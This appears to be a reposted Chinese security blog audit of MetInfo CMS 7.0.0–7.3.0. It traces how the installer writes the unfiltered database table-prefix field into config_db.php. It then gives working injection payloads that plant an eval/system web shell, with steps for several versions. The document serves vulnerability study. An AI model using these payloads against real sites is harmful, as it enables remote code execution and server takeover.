米拓建站系统1day审计与利用

  • A+
所属分类:代码审计
米拓建站系统1day审计与利用
原创稿件征集

邮箱:[email protected]
QQ:3200599554
黑客与极客相关,互联网安全领域里
的热点话题
漏洞、技术相关的调查或分析
稿件通过并发布还能收获
200-800元不等的稿酬


Metinfocms命令执行

前话:

米拓企业建站系统是一款由长沙某公司自主研发的免费开源企业级CMS,该系统拥有大量的用户使用,及对该款cms进行审计,如果利用CNVD-2021-01930进行进一步深入,其危害的严重性可想而知。

审计过程:

1.Index:拿到源码先看根目录的index.php看看都包含(加载)了什么文件

米拓建站系统1day审计与利用

2.关键词:在/app/system/entrance.php看到了配置文件的定义,全局搜索这’PATH_CONFIG‘参数。

米拓建站系统1day审计与利用

全局搜索并找到install/index.php文件下有这个参数,点击跟进查看。

米拓建站系统1day审计与利用

在这个文件的219行有个是接收db数据库参数的方法。

官方说明$_M数组
https://doc.metinfo.cn/dev/basics/basics75.html

这里是接收from数据的db_prefix参数。也就是“数据表前缀”内容的值。

米拓建站系统1day审计与利用

往下发现是直接写入tableper然后赋值给config变量。

米拓建站系统1day审计与利用

并在264fopen打开/config/config_db.php进行没有安全过滤的字节流(fputs)方式的写入。

米拓建站系统1day审计与利用

影响版本:7.3.0- 7.0.0

一、进行7.3.0安装步骤,访问http://127.0.0.1/install/index.php

米拓建站系统1day审计与利用

二、选中传统安装继续下一步

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用


三、数据库信息进行写shell

代码执行Payload:"*/@eval($_GET['1']);/*

命令执行Payload:"*/@system($_GET['1']);/*

代码执行:

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用

点击保存进行下一步验证,出现这报错信息,可以查看configconfig_db.php文件。

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用成功写入

米拓建站系统1day审计与利用


命令执行:

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用

7.0.0版本:

 

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用米拓建站系统1day审计与利用米拓建站系统1day审计与利用7.1.0版本:

Payload:"*/@eval($_GET['1']);@system($_GET['2']);/*

 

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用米拓建站系统1day审计与利用7.2.0版本:

Payload:"*/@eval($_GET['1']);@system($_GET['2']);/*

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用

米拓建站系统1day审计与利用

推荐实操:MetInfo SQL注入 

https://www.hetianlab.com/expc.do?ec=ECID269f-6dc2-4412-bbad-a27109b207cf&pk_campaign=weixin-wemedia#stu  

通过该实验掌握MetInfo SQL注入漏洞的原因和利用方法,以及如何修复该漏洞。

米拓建站系统1day审计与利用

“阅读原文”


体验免费靶场

本文始发于微信公众号(合天网安实验室):米拓建站系统1day审计与利用

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: